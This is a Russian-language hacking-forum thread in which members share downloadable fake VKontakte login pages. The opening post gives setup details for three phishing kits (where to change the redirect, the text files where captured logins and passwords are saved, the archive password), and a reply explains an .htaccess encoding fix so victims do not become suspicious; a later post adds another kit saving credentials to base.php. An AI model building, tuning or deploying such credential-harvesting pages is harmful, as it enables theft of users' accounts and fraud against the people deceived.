• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Фейк VK


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Сегодня на ифуде попались на глаза пара фейков ВК.Первый такого вида и содержания:
Фейк сайт "Неверный логин или пароль"Вконтакте.
Настройка:
Изменить изображение можно в файле
Код:
login.php (Строка:URL=http://vk.com/albums230607652?z=photo230607652_323471159/photos230607652/'></head></html>";).
Пароли и логины сохраняются в файл:karavella.txt.
Можно изменить название на свое в файле login.php
($log = fopen("karavella.txt","at");.
Снимок.JPG

После ввода пароля,открывается фотка в ВК (или любая другая ссылка)

Снимок.JPG

Всё что ввёл пользователь,сохраняется в файле karavella.txt

К сожалению второй фейк под названием:
"Чтобы просматривать эту страницу нужно зайти на сайт" у меня отображается некорректно,походу нужен файл со стилями (css).Может Олег подскажет.Настройки аналогичные настройкам выше. (отображается неправильно),должно выглядеть вот так:
Снимок.JPG

Ну и бонус (я не стал его заливать т.к он показался мне не реалистичным):"Подарки вк"
Настройка:
Изменить изображение можно в файле
Код:
login.php (Строка:URL=URL=http://nakrutka-like.besaba.com//'></head></html>";).
Пароли и логины сохраняются в файл:HERASIM.txt.
Можно изменить название на свое в файле login.php
($log = fopen("karavella.txt","at");.
Снимок.JPG

Снимок.JPG

Пасс на архивы:
[HIDE=10]123456[/HIDE]
 

Вложения

  • Фейк сайт Неверный логин или парольВконтакте.rar
    156.1 КБ · Просмотры: 41
  • Фейк Вконтакте Чтобы просматривать эту страницу нужно зайти на сайт.rar
    108.3 КБ · Просмотры: 52
  • Подарки вк.rar
    198.1 КБ · Просмотры: 29

NIN@

Уважаемый пользователь
Форумчанин
Регистрация
26.03.2014
Сообщения
345
Репутация
430
К сожалению второй фейк под названием:
"Чтобы просматривать эту страницу нужно зайти на сайт" у меня отображается некорректно,походу нужен файл со стилями (css).
У меня тоже фейк отображался некорректно.

Я тестил в хроме и IE в обоих случаях отображался, как на скрине. Я понимаю, что в браузере, например, в хроме нужно просто зайти в инструменты - кодировка и изменить с юникод (UTF-8) на кириллица (windows-1251). Ты ж не будешь это объяснять жертве, а подозрение сразу возникнет по-любому. Зачем так волновать людей?
Вот как я решил данную задачу:
Начал разбираться отсюда Создал файл .htaccess и прописал в нем AddDefaultCharset CP1251, загрузил в корень и все big010101
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
У меня тоже фейк отображался некорректно.
В моё случае проблема не с кодировкой,хотя встречался с этой фигнёй в этой теме и там просто поставил кодировку cp1251 прямо в пхп коде странички.Да и не проблема это вовсе,так как я не создаю фейки для развода пользователей.Ну завладею страничкой какого-нибудь Васи Пупкина,а дальше что?Я и в ВК то бываю раз в месяц.
 

NIN@

Уважаемый пользователь
Форумчанин
Регистрация
26.03.2014
Сообщения
345
Репутация
430
У самого на соц.сети "аллергия", по-моему, более тупого занятия, как просиживания в соц.сетях, сложно представить. Но огромное количество людей там буквально живет, в связи с этим, полезно знать кое-какие тонкости My mind
 

Denis27

Уважаемый пользователь
Форумчанин
Регистрация
04.03.2014
Сообщения
702
Репутация
1 168
Одно время таких поддельных страничек было много , особенно популярным был сервис для проверки "гостей в контакте" с платной подпиской, но иногда он был представлен и в виде приложения, после установки которого блокировался комп) жаль что не сохранил эти программки, а то дал бы вам для исследования.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Ещё один фейк на тему "Подарки ВК".Все введённые данные сохраняются в base.php.
Снимок.PNG




Снимок1.PNG
 

Вложения

  • podarkivkontakte2014.rar
    7.9 КБ · Просмотры: 21

carioca_cat

^•-•^
Форумчанин
Регистрация
16.08.2013
Сообщения
188
Репутация
570
Ещё один фейк на тему "Подарки ВК".Все введённые данные сохраняются в base.php.
IMG_20140724_201648.jpg
Ещё вчера заходил на этот сайт, ради любопытства, сегодня уже блоке у F-Secure. Заметил, что такое неоднократно повторяется при посещении сайтов, которые потом оказываются фишинговыми и т.д. Впечатление, что какая-то статистика собирается по посещаемым ресурсам.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Ещё вчера заходил на этот сайт, ради любопытства, сегодня уже блоке у F-Secure.
Этот акк ещё держиться)Сейчас остальные посмотрел с примерами всякой хрени-всё заблочено у Хостингера.И ведь если написать в саппорт,что мои ботнеты и фейки залиты в образовательных целях-не поверят.
 

NIN@

Уважаемый пользователь
Форумчанин
Регистрация
26.03.2014
Сообщения
345
Репутация
430
Сорри, за флуд, не удержалась:utenok:
Может, админам предложить доп. кнопку "Мне не нравится"смех-смех!!!?
Этот форум тоже ведь своего рода соц.сетьWinkSmile
P.S. чудно читать свои посты, в к-х пишу от мужского имени, прям шиза какая-тоi'm crazy "Спасибо", добрым кардерам...
Блин, а мужиком-то быть проще в сети :Mem15:, но всё-таки хочется быть собойkiss you blush1
Интересно, а почему здесь так мало смайлов женского рода?! - дискриминация какая-тоsholoh it
 

Вложения

  • Ярмак - Мне не нравится(2012).mp3
    7.1 МБ · Просмотры: 6

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 064
Репутация
8 166
Интересно, а почему здесь так мало смайлов женского рода?! - дискриминация какая-тоsholoh it
Ну так предлагайте смайлы, можно любые залить !

Хотя много наверное тоже вредно, правда здесь есть возможность отсортировать по категориям для поиска нужного смайла...Не въехал!!!
 
Верх Низ